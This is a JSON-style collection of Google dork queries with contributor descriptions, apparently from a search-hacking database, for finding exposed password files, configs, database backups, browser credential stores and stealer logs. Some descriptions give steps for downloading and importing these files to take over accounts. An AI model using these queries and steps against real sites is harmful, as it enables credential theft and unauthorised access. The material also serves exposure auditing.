"filetype:bak inurl:\"htaccess|passwd|shadow|htusers\"", "description": "This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version). Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences."}, {"dork": "\"http://*:*@www\" bob:bob", "description": "This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net\"http://*:*@www\" bangbus or \"http://*:*@www\"bangbusAnother way is by just typing\"http://bob:bob@www\""}, {"dork": "filetype:conf oekakibbs", "description": "Oekakibss is a japanese anime creation application. The config file tells an attacker the encrypted password."}, {"dork": "LeapFTP intitle:\"index.of./\" sites.ini modified", "description": "The LeapFTP client configuration file \"sites.ini\" holds the login credentials for those sites in plain text. The passwords seems to be encrypted."}, {"dork": "filetype:ini wcx_ftp", "description": "This searches for Total commander FTP passwords (encrypted) in a file called wcx_ftp.ini. Only 6 hits at the moment, but there may be more in the future."}, {"dork": "filetype:config config intext:appSettings \"User ID\"", "description": "These files generally contain configuration information for a .Net Web Application. Things like connection strings to databases file directories and more. On a properly setup IIS these files are normally not served to the public."}, {"dork": "\"index of/\" \"ws_ftp.ini\" \"parent directory\"", "description": "This search is a cleanup of a previous entry by J0hnny. It uses \"parent directory\" to avoid results other than directory listings.WS_FTP.ini is a configuration file for a popular win32 FTP client that stores usernames and weakly encoded passwords. There is another way to find this file, that was added by Xewan:filetype:ini ws_ftp pwdIn our experience it's good to try both methods, as the results will differ quite a bit."}, {"dork": "filetype:mdb wwforum", "description": "Web Wiz Forums is a free ASP Bulletin Board software package. It uses a Microsoft Access database for storage. The installation instructions clearly indicate to change the default path and filename (admin/database/wwForum.mdb).vendor: http://www.webwizguide.info/web_wiz_forums/The forum database contains the members passwords, either encrypted or in plain text, depending on the version.Please note: this search is proof that results can stay in Google's index for a long time, even when they are not on the site any longer. Currently only 2 out of 9 are actually still downloadable by an attacker."}, {"dork": "\"Powered By Elite Forum Version *.*\"", "description": "Elite forums is one of those Microsoft Access .mdb file based forums. This one is particularly dangerous, because the filename and path are hardcoded in the software. An attacker can modify index.php for ./data/users/userdb.dat, open the file and see something like this:42administrat4571XXX367b52XXXb33b6ce74df1e0170(data was xx'd)These are MD5 digests and can be brute forced (with enough time) or dictionary cracked by a malicious user, thus giving adminstrator access to the forum."}, {"dork": "filetype:ini inurl:flashFXP.ini", "description": "FlashFXP offers the easiest and fastest way to transfer any file using FTP, providing an exceptionally stable and robust program that you can always count on to get your job done quickly and efficiently. There are many, many features available in FlashFXP.The flashFXP.ini file is its configuration file and may contain usernames/passwords and everything else that is needed to use FTP."}, {"dork": "inurl:chap-secrets -cvs", "description": "linux vpns store their usernames and passwords for CHAP authentification in a file called \"chap-secrets\" where the usernames and the passwords are in cleartext."}, {"dork": "inurl:pap-secrets -cvs", "description": "linux vpns store there usernames and passwords for PAP authentification in a file called \"pap-secrets\" where the usernames and the passwords are in cleartext."}, {"dork": "filetype:ini inurl:\"serv-u.ini\"", "description": "serv-U is a ftp/administration server for Windows. This file leaks info about the version, username and password. Passwords are in encrypted, but there is a decryption program available on the Net. An attacker could use this search to upload dangerous code etc."}, {"dork": "\"liveice configuration file\" ext:cfg -site:sourceforge.net", "description": "This finds the liveice.cfg file which contains all configuration data for an Icecast server. Passwords are saved unencrypted in this file."}, {"dork": "intext:\"enable secret 5 $\"", "description": "sometimes people make mistakes and post their cisco configs on \"help sites\" and don't edit the sensitive fields first. Don't forget to also query Google Groups for this string."}, {"dork": "\"powered by ducalendar\" -site:duware.com", "description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Ducalendar it's: /ducalendar/_private/ducalendar.mdb"}, {"dork": "\"Powered by Duclassified\" -site:duware.com", "description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Duclassified it's: /duclassified/_private/duclassified.mdb"}, {"dork": "\"Powered by Dudirectory\" -site:duware.com", "description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For DuDirectory it's: /dudirectory/_private/dudirectory.mdb"}, {"dork": "\"Powered by Duclassified\" -site:duware.com \"DUware All Rights reserved\"", "description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Duclassified it's: /duclassified/_private/duclassified.mdb"}, {"dork": "\"powered by duclassmate\" -site:duware.com", "description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Duclassmate it's: /duclassmate/_private/duclassmate.mdb"}, {"dork": "intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com", "description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Dupics rename location to ../_private/dupics.mdb"}, {"dork": "\"powered by dudownload\" -site:duware.com", "description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. rename ../xxx to ../_private/dudownload.mdb"}, {"dork": "filetype:log \"See `ipsec --copyright\"", "description": "BARF log filesMan page:Barf outputs (on standard output) a collection of debugging information (contents of files, selections from logs, etc.) related to the IPSEC encryption/authentication system. It is primarily a convenience for remote debugging, a single command which packages up (and labels) all information that might be relevant to diagnosing a problem in IPSEC."}, {"dork": "inurl:\"GRC.DAT\" intext:\"password\"", "description": "symantec Norton Anti-Virus Corporate Edition data file containing encrypted passwords."}, {"dork": "inurl:filezilla.xml -cvs", "description": "filezilla.xml contains Sites,Logins and crypted Passwords of ftp connections made with the open source programm filezilla."}, {"dork": "intext:\"powered by Web Wiz Journal\"", "description": "Web Wiz Journal ASP Blog. The MDB database is mostly unprotected and can be downloaded directly. The DB contains administrative acccountsfilename: journal.mdbadmin login: admin.html"}, {"dork": "ext:ini eudora.ini", "description": "Well, this is the configuration file for Eudora...may contain sensitive information like pop servers, logins and encypted passwords sometimes."}, {"dork": "ext:ini Version=4.0.0.4 password", "description": "The servU FTP Daemon ini file contains setting and session information including usernames, passwords and more. This is a more specific search for ServU passwords base on a previous dork by Cybercide."}, {"dork": "filetype:inc mysql_connect OR mysql_pconnect", "description": "INC files have PHP code within them that contain unencrypted usernames, passwords, and addresses for the corresponding databases. Very dangerous stuff. The mysql_connect file is especially dangerous because it handles the actual connection and authentication with the database."}, {"dork": "\"Powered by DUpaypal\" -site:duware.com", "description": "Here is another DUware product, DUpaypal. Once you get hold of the database it contains the admin username and password. The default by the way is admin/passwordThe default location for the database is ../_private/DUpaypal.mdb"}, {"dork": "\"Powered by Link Department\"", "description": "Link management script with advanced yet easy to use admin control panel, fully template driven appearance, static HTML front-end and email notifications.Below the link list a folder 'ld' exists which contains various juicy information like encrypted admin passwords and session data."}, {"dork": "intitle:\"Index of\" sc_serv.conf sc_serv content", "description": "This dork lists sc_serv.conf files. These files contain information for Shoutcast servers and often contain cleartext passwords.Original dork: filetype:conf sc_serv.confCleaned by: c0wzClean date: 2005-04-26"}, {"dork": "filetype:sql (\"passwd values\" | \"password values\" | \"pass values\" )", "description": "Find insert statements where the field (or table name) preceding the operator VALUES will be 'password' or 'passwd' or 'pass'. The rest of the statement should contain encrypted or plaintext password.An attacker can use these files to acquire database permissions that normally would not be given to the masses."}, {"dork": "ext:txt inurl:unattend.txt", "description": "the unattend.txt is used to drive unanttended MS Windows installations. The files contain all information for a Windows information including Administrator's passwords, IP addresses and product IDs."}, {"dork": "filetype:inf sysprep", "description": "sysprep is used to drive unanttended MS Windows installations. The files contain all information for a Windows information including Administrator's passwords, IP addresses and product IDs."}, {"dork": "wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin", "description": "This is a filtered version of previous 'inurl:passwd' searches, focusing on WWWBoard [1]. There are different crypt functions involved [2], but the default username and password is 'WebAdmin:WebBoard' without the quotes. This is my first Googledork entry, so be gentle :)Funny enough, many of the DES hashes seem to use a salt of \"ae\". I tried just using this string along with the inurl portion, but it seemed to inappropriately restrict the search. Couple this with [3] and, um, yeah.cykyc[1]http://www.scriptarchive.com/wwwboard.html[2]http://www.scriptarchive.com/faq/wwwboard.html#q2[3]http://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=625"}, {"dork": "intext:\"powered by EZGuestbook\"", "description": "HTMLJunction EZGuestbook is prone to a database disclosure vulnerability. Remote users may download the database http://www.securityfocus.com/bid/13543/info/"}, {"dork": "inurl:perform.ini filetype:ini", "description": "mIRC Passwords For Nicks & Channels in channel\\[chanfolder] section of mirc.ini you can find 2 type of \"private\" information - secret channels (that is +ps is not listed everythere) and password protected channels - passwords stored in plaintext)"}, {"dork": "filetype:dat inurl:pass.dat", "description": "Accesses passwords mostly in cgibin but not all the timeCan find passwords + usernames (sometimes username), some unecrypted some not"}, {"dork": "inurl:cgi-bin inurl:calendar.cfg", "description": "CGI Calendar (Perl) configuration file reveals information including passwords for the program."}, {"dork": "[WFClient] Password= filetype:ica", "description": "The WinFrame-Client infos needed by users to connect toCitrix Application Servers (e.g. Metaframe).Often linked/stored on Webservers and sometimes reachable from Internet.Password is 16-byte-Hash of unknown encryption (MSCHAPv2 ?).File Extension is \"ica\" the so called Citrix\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae Independent Computing Architecture.These files may contain login information (Username, Password, Domain)."}, {"dork": "filetype:dat inurl:Sites.dat", "description": "If you want to find out FTP passwords from FlashFXP Client, just type this query in google and you'll find files called Sites.dat which contain ftp sites, usernames and passwords. If you want to use it, just install FlashFXP and copy whole section to your sites.dat file (file is in your flashFXP directory)."}, {"dork": "intext:\"enable password 7\"", "description": "some people are that stupid to keep their Cisco routers config files on site. You can easly find out configs and password alog with IP addresses of this devices. Above string let you find weak passwords, which are encrypted but can be decrypted by free tool called GetPass and provided by boson.com"}, {"dork": "\"your password is\" filetype:log", "description": "This search finds log files containing the phrase (Your password is). These files often contain plaintext passwords, although YMMV."}, {"dork": "\"admin account info\" filetype:log", "description": "searches for logs containing admin server account information such as username and password."}, {"dork": "inurl:/yabb/Members/Admin.dat", "description": "This search will show you the Administrator password (very first line) on YaBB forums whose owners didnt configure the permissions correctly. Go up a directory to get a full memberlist (the .dat files have the passwords)."}, {"dork": "inurl:\"Sites.dat\"+\"PASS=\"", "description": "FlashFXP has the ability to import a Sites.dat file into its current Sites.dat file, using this search query you are able to find websites misconfigured to share the flashfxp folder and subsequently the Sites.dat file containing all custom sites the victim has in their sitelist. the passwords are not clear text but if you import the sites.dat into flashfxp you can connect to the ftps and it automatically sends the password. you can also set flashfxp to not hide passwords and it will show you what the password is when it connects."}, {"dork": "ext:yml database inurl:config", "description": "Ruby on Rails is a MVC full-stack framework for development of web applications. There's a configuration file in this framework called database.yml that links the Rails with the DB. It contains all the info needed to access de DB including username and password in clear text."}, {"dork": "\"parent directory\" +proftpdpasswd", "description": "User names and password hashes from web server backups generated by cpanel for ProFTPd. Password hashes can be cracked, granting direct access to FTP accounts. Unix passwd and shadow files can sometimes be found with this query as well."}, {"dork": "inurl:ventrilo_srv.ini adminpassword", "description": "This search reveals the ventrilo (voice communication program used by many online gamers) passwords for many servers. Possiblity of gaining control of the entire server."}, {"dork": "filetype:bak createobject sa", "description": "This query searches for files that have been renamed to a .bak extension (obviously), but includes a search for the characters \"sa\" (default SQL server admin id) and \"createobject\" which is requisite VBScript for opening some sort of odbc/ado connection. Since the sql id and password are plain text, it's easy to connect to the SQL server once you have this information... especially those that use \"server=127.0.0.1\" so you know IIS & SQL Server are running on the same box."}, {"dork": "inurl:\"editor/list.asp\" | inurl:\"database_editor.asp\" | inurl:\"login.asa\" \"are set\"", "description": "This search finds CLEARTEXT usernames/passwords for the Results Database Editor. The log in portal can be found at /editor/login.asp. At time of submitting there are 21 results.Also a search for the logins:inurl:\"Results/editor/login.asp\"\"Database Editor Login\" \"Results Page\""}, {"dork": "ext:passwd -intext:the -sample -example", "description": "Various encrypted passwords, some plaintext passwords and some private keys are revealed by this search."}, {"dork": "enable password | secret \"current configuration\" -intext:the", "description": "Another Cisco configuration search. This one is cleaner, gives complete configuration files and it catches plaintext, \"secret 5\" and \"password 7\" passwords."}, {"dork": "filetype:reg reg +intext:\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u201a\u00c2\u009dWINVNC3\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u201a\u00c2\u009d", "description": "This can be used to get encoded vnc passwords which can otherwise be obtained by a local registry and decoded by cain & abel. The query find registry entries which can otherwise be found can locally in:\\HKEY_CURRENT_USER\\Software\\ORL\\WinVNC3\\Password or\\HKEY_USERS\\.DEFAULT\\Software\\ORL\\WinVNC3\\PasswordIf you are a cain and abel user you'll and have used this feature before you will know how useful this query is. Other than decoded passwords you can also find other useful information on the VNC server and its security. I have successfully gained access to many VNC servers."}, {"dork": "\"login: *\" \"password= *\" filetype:xls", "description": "This returns xls files containing login names and passwords. it works by showing all the xls files with password:(something)so a downside is that u do get stuff like \"password protected\", \"password services\" etc. (and the same for login)But...most of the decent ones have the login and password in the text given to you by google, so its easy to seperate the useful ones from the others."}, {"dork": "inurl:-cfg intext:\"enable password\"", "description": "Google search for Cisco config files (some variants below):\ninurl:router-confg\ninurl:-confg intext:enable password\ninurl:-config intext:\"enable password\"\ninurl:-cfg intext:\"enable secret\"\ninurl:-confg intext:enable secret\ninurl:-confg intext:\"enable secret\" \nAuthor: fdisk"}, {"dork": "inurl:web/frontend_dev.php -trunk", "description": "Google search for web site build with symfony framework and in\ndevelopment environment.\nIn most case, you have a bar development on top of the web page. If you\ngo in config -> Settings, you can find login and password.\nif you replace web/frontend_dev.php by config/databases.yml in url, you\ncan find login / password for the databases\nAuthor: Simon Leblanc"}, {"dork": "inurl:ftp \"password\" filetype:xls", "description": "this string may be used to find many low hanging fruit on FTP sites recently indexed by google. Author: Uhaba"}, {"dork": "filetype:php~ (pass|passwd|password|dbpass|db_pass|pwd)", "description": "Backup or temp versions of php files containing you guessed it passwords or\nother ripe for the picking info...\nAuthor: Bastich"}, {"dork": "\"My RoboForm Data\" \"index of\"", "description": "This dork looks for Roboform password files. Author: Robert McCurdy"}, {"dork": "ext:xml (\"mode_passive\"|\"mode_default\")", "description": "OffSec:\nSo the dork is:\next:xml (\"mode_passive\"|\"mode_default\")\nThis dork finds Filezilla XML files.\ufffd To be more specific;\n\ufffd\ufffd\ufffd recentservers.xml\n\ufffd\ufffd\ufffd sitemanager.xml\n\ufffd\ufffd\ufffd filezilla.xml\nThese files contain clear text usernames and passwords.\ufffd They also contain the hostname or IP to connect to as well as the port.\ufffd Most of these results will be for FTP however, you can also get port 22 to SSH in.\ufffd This dork of course can be modified to target a specific website by appending site:whateversite.com.\ufffd You can also look for a specific username like root by appending \"root\" to the dork.\ufffd\ufffd\nRegards,\nnecrodamus\nhttp://www.twitter.com/necrodamus2600\nhttp://www.photobucket.com/profile/necrodamus2600"}, {"dork": "filetype:xls \"username | password\"", "description": "filetype:xls \"username | password\" This search reveals usernames and/or passwords of the xls documents.\nby Stakewinner00"}, {"dork": "\"parent directory\" proftpdpasswd intitle:\"index of\" -google", "description": "This dork is based on this: https://www.exploit-db.com/ghdb/1212/\n but improved cause that is useless, instead of this:\n \"parent directory\" proftpdpasswd intitle:\"index of\" -google\n Best regards,\n Nemesis"}, {"dork": "inurl:\"/dbman/default.pass\"", "description": "A path to a DES encrypted password for DBMan (\r\n\r\nhttp://www.gossamer-threads.com/products/archive.html) ranging from Guest\r\n\r\nto Admin account, this is often found coupled with cgi-telnet.pl (\r\n\r\nhttp://www.rohitab.com/cgi-telnet) which provides an admin login, by\r\n\r\ndefault and the password provided by DBMan's path /dbman/default.pass\r\n\r\n\r\n\r\n\r\n\r\nI have already posted this to packetstorm on June 7th 2004, called\r\n\r\ncgitelnetdbman (\r\n\r\nhttp://packetstormsecurity.org/files/29530/cgitelnetdbman.pdf.html)\r\n\r\n\r\n\r\nThe 'Dork' is *inurl:\"/dbman/default.pass\" *\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nLawrence Lavigne (ratdance)\r\n\r\n-suidrewt"}, {"dork": "allinurl:\"User_info/auth_user_file.txt\"", "description": "Google dork for find user info and configuration password of DCForum\nallinurl:\"User_info/auth_user_file.txt\"\n- Ajith Kp"}, {"dork": "ext:xml (\"proto='prpl-'\" | \"prpl-yahoo\" | \"prpl-silc\" | \"prpl-icq\")", "description": "*Google Search:*\nhttps://www.google.com/search?q=ext:xml%20(%22proto='prpl-'%22%20|%20%22prpl-yahoo%22%20|%20%22prpl-silc%22%20|%20%22prpl-icq%22) \n*Description:*\nFind Accounds and Passwords from Pidgin Users.\nGoogle limit queries to 32 words so it?s impossible to search for all \nAccount-Types in one query!\nList of all Params: Feel free to build your own search query.\nproto='prpl-'; prpl-silc; prpl-simple; prpl-zephyr; prpl-bonjour; \nprpl-qq; prpl-meanwhile; prpl-novell; prpl-gg; prpl-myspace; prpl-msn; \nprpl-gtalk; prpl-icq; prpl-aim; prpl-yahoo; prpl-yahoojp; prpl-yah; \nprpl-irc; prpl-yabber\n*Author:* la.usch.io"}, {"dork": "filetype:inc OR filetype:bak OR filetype:old mysql_connect OR mysql_pconnect", "description": "Aggregates previous mysql_(p)connect google dorks and adds a new filetype.\nSearches common file extensions used as backups by PHP developers. These\nextensions are normally not interpreted as code by their server, so their\ndatabase connection credentials can be viewed in plaintext.\n- Andy G - twitter.com/vxhex"}, {"dork": "filetype:config inurl:web.config inurl:ftp", "description": "This google dork to find sensitive information of MySqlServer , \"uid, and\npassword\" in web.config through ftp..\nfiletype:config inurl:web.config inurl:ftp\n-Altamimi"}, {"dork": "ext:sql intext:@hotmail.com intext :password", "description": "By ,\nNItish Mehta ,\nIlluminative Works(CEO & Founder )"}, {"dork": "filetype:sql insite:pass && user", "description": "Google Dork: filetype:sql insite:pass && user\nWe Can get login username and password details from .sql file.\nAuthor: BlacK_WooD"}, {"dork": "site:github.com inurl:sftp-config.json intext:/wp-content/", "description": "Finds disclosed ftp FTP for Wordpress installs, which have been pushed to a public repo on GitHub.\nCredit: RogueCoder"}, {"dork": "site:github.com inurl:sftp-config.json", "description": "Find disclosed FTP login credentials in github repositories\nCredit: RogueCoder"}, {"dork": "filetype:password jmxremote", "description": "Passwords for Java Management Extensions (JMX Remote)\nUsed by jconsole, Eclipse's MAT, Java Visual VM, JmxCli\nhttp://docs.oracle.com/javase/6/docs/technotes/guides/management/agent.html\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "inurl:/backup intitle:index of backup intext:*sql", "description": "Google Search:https://www.google.com/search?client=opera&q=admin+username+and+pass&sourceid=opera&ie=UTF-8&oe=UTF-8#q=inurl:/backup+intitle:index+of+backup+intext:*sql&start=70\n1)Find the Back Up\n2)Downlod it\n3)Import it into phpmyadmin\n4)Find the admin username and password :)\nDork submitted by The Vi9er\nGood Luck"}, {"dork": "inurl:yahoo_site_admin/credentials/", "description": "# Exploit Title: [Yahoo Hosting db-credentials]\n# Google Dork: [inurl:yahoo_site_admin/credentials/]\n# Date: [29/11/2014]\n# Exploit Author: [Mohammad Shahein]\n# Vendor Homepage: [www.boxeffect.com ]\n# Tested on: Win7 ,Google Chrome Version 39.0.2171.71 m]\nGoogle the dork it will allow you to download db.conf the file will contain\nthe following info\n mysql\n [ database name ]\n [ database user name ]\n [ database password ]\n*Mohammad Shaheen*\nsenior Programer, BoxEffect\nwebsite: www.boxeffect.com"}, {"dork": "inurl:\"security/xamppdirpasswd.txt\"", "description": "This dork shows the plain text password saved in a XAMPP installation when\nthe administrator configures \"Security Console MySQL & XAMPP directory\nprotection\":\ninurl:\"security/xamppdirpasswd.txt\"\nAuthor: @felmoltor\n-- \nFelipe Molina de la Torre"}, {"dork": "ext:sql intext:\"alter user\" intext:\"identified by\"", "description": "This dork will show files containing SQL instructions where the\nadministrator set a password for a database user.\nAuthor: @felmoltor"}, {"dork": "ext:csv intext:\"password\"", "description": "This dork finds csv files containing passwords and other juicy information.\nAuthor:NickiK."}, {"dork": "intext:DB_PASSWORD ext:env", "description": "This dork finds env files, usually used in Laravel configuration, \ncontaining passwords and other juicy information.\nAuthor: Augusto Pereira"}, {"dork": "site:pastebin.com intext:Username", "description": "# Exploit Title: [site:pastebin.com intext:Username]\n# Google Dork: [Pastebin Username & Password]\n# Date: [6/29/2015]\n# Exploit Author: [Daz Holmes]"}, {"dork": "intext:@pwcache \"parent directory\"", "description": "intext:@pwcache \"parent directory\"\nBest regards,\nAdam Bedard"}, {"dork": "filetype:log intext:password | pass | pw", "description": "http://www.google.com/search?q=filetype:log intext:password | pass | pw\nLog files containing passwords...\nDecoy"}, {"dork": "inurl:etc -intext:etc ext:passwd", "description": "Files with a lot of passwords. Enjoy healthy!.\nDork by Rootkit Pentester."}, {"dork": "ext:sql intext:username intext:password", "description": "search turns up database files with cleartext and encryption, often leading\nto open directory structures and configuration files."}, {"dork": "inurl:wp-config -intext:wp-config \"'DB_PASSWORD'\"", "description": "I give this Dork for Wordpress Passwords. I hope you enjoy with this!.\nDork: inurl:wp-config -intext:wp-config \"'DB_PASSWORD'\"\nBest Regards Rookit Pentester."}, {"dork": "intext:\"END_FILE\" ext:log", "description": "Description: Files containing passwords\nGoogle search: intext:\"END_FILE\" ext:log\nAuthor: nebo_oben"}, {"dork": "site:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com daterange:2457388-2457491", "description": "# Exploit Title: [Files Containing E-mail and Associated Password Lists]\n# Google Dork: [site:pastebin.com intext:@gmail.com | @yahoo.com | \n@hotmail.com daterange:2457388-2457491 (adjust daterange as required)]\n# Date: [04/13/2016]\n# Exploit Author: [Stephanie Jensen]\n# Contact: [https://twitter.com/Steph_J_]\n# Website: [http://www.scriptkittysecurity.com]\n1.Description\nThis dork searches for all files within pastebin.com containing email \naddresses associated with yahoo, gmail or hotmail accounts. Due to the \nculture of pastebin.com most entries contain associated passwords for \nthese email addresses. Setting a relatively recent daterange query \nterm allows for recent files to be displayed.\nsite:pastebin.com intext:@gmail.com | @yahoo.com | @hotmail.com \ndaterange:2457388-2457491 (date range can be changed for recent \nlisting of files - must use julian dates)"}, {"dork": "intext:\"eav\" filetype:txt", "description": "Files containing usernames & passwords of NOD32 antivirus accounts. \nGoogle dork:\nintext:\"eav\" filetype:txt\nThanks!\nD0bby"}, {"dork": "site:static.ow.ly/docs/ intext:@gmail.com | Password", "description": "This dork results in documents containing passwords that are stuck in ow.ly\ncache.\nMajority are from 2016 and are still working.\nDiscovered by @BLM_KRS (Twitter)"}, {"dork": "inurl:\"/wp-content/wpclone-temp/wpclone_backup/\"", "description": "Author: Charley Celice (@charleycelice)\nThis dorks often results in backed-up \"database.sql\" files, which contain\nWordPress usernames and passwords.\n-stmerry"}, {"dork": "inurl:proftpdpasswd", "description": "Dork of proftpd passwords!.\nHave Fun!.\nDork by Rootkit Pentester."}, {"dork": "inurl:github.com intitle:config intext:\"/msg nickserv identify\"", "description": "Github irc raw password:\r\n\r\n\r\n\r\ninurl:github.com intitle:config intext:\"/msg nickserv identify\"\r\n\r\n\r\n\r\n- al4r0"}, {"dork": "intitle:\"index of/\" CCCam.cfg", "description": "intitle:\"index of/\" CCCam.cfg\nConfig file contains User and Passwords of CCCam Servers.\nGuillermo Gaz\u00f3n\nInnotec System - Security Researchs"}, {"dork": "site:cloudshark.org/captures# password", "description": "Dork: site:cloudshark.org/captures# password\nPCAP captures containing passwords\nMr. Cheshire\nSee also: http://www.elladodelmal.com/2017/02/cloudshark-tus-credenciales-en-las.html"}, {"dork": "\"your default password is\" filetype:pdf", "description": "\"your default password is\" filetype:pdf\n*Richard De Vere*\n*Principal Consultant*\n*Web:* TheAntiSocialEngineer.com\n*Twitter:* @AntiSocial_Eng"}, {"dork": "\"Index of\" \"logins.json\" \"key3.db\"", "description": "Finds directories containing saved Firefox passwords, browsing history, and\r\n\r\nmore.\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "inurl:\"-wp13.txt\"", "description": "Finds config files for MySQL, ABSPATH, Wordpress, and more!\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "filetype:bak inurl:php \"mysql_connect\"", "description": "PHP backups that contain MySQL database passwords.\r\n\r\n\r\n\r\nfiletype:bak inurl:php \"mysql_connect\""}, {"dork": "\"[main]\" \"enc_GroupPwd=\" ext:txt", "description": "Finds Cisco VPN client passwords (encrypted, but easily cracked!)\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "ext:fetchmailrc", "description": "Finds .fetchmailrc files with eMail login info\nDxtroyer"}, {"dork": "\"FileZilla\" inurl:\"recentservers.xml\" -git", "description": "Finds FileZilla recent server files with plain text usernames/passwords\nDxtroyer"}, {"dork": "\" End Stealer \" ext:txt", "description": "Finds logs from \"Black Stealer\", an internet password stealer\nDxtroyer"}, {"dork": "\"iSpy Keylogger\" \"Passwords Log\" ext:txt", "description": "Description: iSpy keylogger logs\nDork: \"iSpy Keylogger\" \"Passwords Log\" ext:txt\nAuthor: scumsec"}, {"dork": "\"mysqli_connect\" ext:inc", "description": "Finds scripts containing MySQL usernames and passwords\nDxtroyer"}, {"dork": "inurl:\"gradle.properties\" intext:\"proxyPassword\"", "description": "Google Dork: Files Containing Passwords\r\n\r\nExploit Author: Huijun Chen"}, {"dork": "site:trello.com password", "description": "This will bring public Trello boards often containing user names and passwords. You can guess the context from the other cards published or fine-tune the query to probe boards you're interested in."}, {"dork": "\"enable secret\" ext:cfg -git -cisco.com", "description": "Finds files containing Cisco NAC hostnames and passwords in plaintext\r\n\r\nDxtroyer\r\n\r\nP.S. Some honeypots too, sorry :P"}, {"dork": "ext:inf SetupMgrTag AdminPassword", "description": "Google Dork: Files Containing Passwords\r\nFinds admin password from windows install config files.\r\n\r\nHuijun Chen"}, {"dork": "\"password\" + ext:conf \"Modem Type = USB Modem\"", "description": "Google Dork: Files Containing Passwords\r\n\r\nHuijun Chen"}, {"dork": "ext:config + \" password=\" + \"", "description": "Google Dork: Files Containing Passwords\r\n\r\nHuijun Chen"}, {"dork": "intitle:\"Index Of\" intext:sftp-config.json", "description": "Description :\r\nThis dork returns list of FTP/SFTP passwords from sublime text.\r\n\r\nDork :\r\nintitle:\"Index Of\" intext:sftp-config.json\r\n\r\nAuthor :\r\nVipin Joshi ( @vocuzi )"}, {"dork": "\"MAIL_PASSWORD\" filetype:env", "description": "*Google* dork *description: *mail credentials ( db credentials) for mostly\r\nlaravel websites\r\n\r\n*Google Search:* \"MAIL_PASSWORD\" filetype:env\r\n\r\n*Submitted by:* Alfie\r\n\r\n*Website: (*https://the-infosec.com*)*"}, {"dork": "\"database_password\" filetype:yml \"config/parameters.yml\"", "description": "*Google dork description: *database credentials for mostly symfony apps\r\n\r\n*Google Search:* \"database_password\" filetype:yml \"config/parameters.yml\"\r\n\r\n*Submitted by:* Alfie\r\n\r\n*Website: (*https://the-infosec.com*)*"}, {"dork": "\"database_password\" filetype:yml \"config/parameters.yml", "description": "Database credentials for mostly CakePHP apps\r\n\r\ndatabase_password\" filetype:yml \"config/parameters.yml\"\r\n\r\nThanks\r\nArya Usha"}, {"dork": "intext:password inurl:\"/log/production\" ext:log", "description": "Rails web application Framework stores passwords and tokens in plain text i\r\nthe log.\r\n\r\n\r\nBruno Schmid"}, {"dork": "CakePHP inurl:database.php intext:db_password", "description": "Contains database username and password along with dbname.\r\n\r\nThanks\r\nKiran S"}, {"dork": "intitle:\"index of /\" inanchor:.kdbx", "description": "This will find KeePass databse files in open web directories, to download\r\nand potentionally bruteforce.Use responsible and ethical!\r\n\r\nDork by _palone"}, {"dork": "site:pastebin.com \"rcon_password\"", "description": "Finding rcon_ passwords to source engine based game servers on pastebin.\r\nThis allows you to execute server side commands, it is kinda like an admin\r\npassword.\r\n\r\nUse ethically and responsibly.\r\nDork by _palonE"}, {"dork": "intitle:\"Index Of\" intext:\".vscode\"", "description": "Description :\r\nMicrosoft Visual Code Editor files containing passwords and config\r\ninformation.\r\n\r\nDork :\r\nintitle:\"Index Of\" intext:\".vscode\"\r\n\r\nAuthor:\r\nVipin Joshi (@vocuzi)"}, {"dork": "inurl:/host.txt + filetype:txt + \"password\"", "description": "inurl:/host.txt + filetype:txt + \"password\"\r\n\r\nFile containing passwords\r\n\r\nManhNho"}, {"dork": "inurl:\"config.xml\" \"password\" ext:xml -stackoverflow.com -github.com", "description": "Several XML config files containing passwords and other interesting info\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "inurl:\"databases.yml\" ext:yml password -github", "description": "Symfony databases passwords.\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:\"index.of\" \"places.sqlite\" \"key3.db\" -mozilla.org", "description": "This dork finds Mozilla Firefox stored passwords, bookmarks, history and \r\nmany other information. It leads you to the \".default\" \r\nfolder where Firefox stores all the user data.\r\n\r\nAlso try:\r\nintitle:\"index.of\" \"permissions.sqlite\" \"cookies.sqlite\" -mozilla.org\r\n\r\n\r\nThe passwords are stored in two different files, both of which are required:\r\n\r\n key3.dbkey4.db (or key3.db, or key4.db) - This file stores the key \r\ndatabase for the user's passwords. To transfer saved passwords, you must \r\ncopy this file along with the logins.json which have the saved passwords.\r\n\r\nOther files are:\r\n\r\nBookmarks, Downloads and Browsing History -> places.sqlite\r\n\r\n\r\nSite-specific preferences -> permissions.sqlite\r\n\r\n\r\nSearch engines -> search.json.mozlz4\r\n\r\n\r\nPersonal dictionary -> persdict.dat\r\n\r\n\r\nAutocomplete history -> 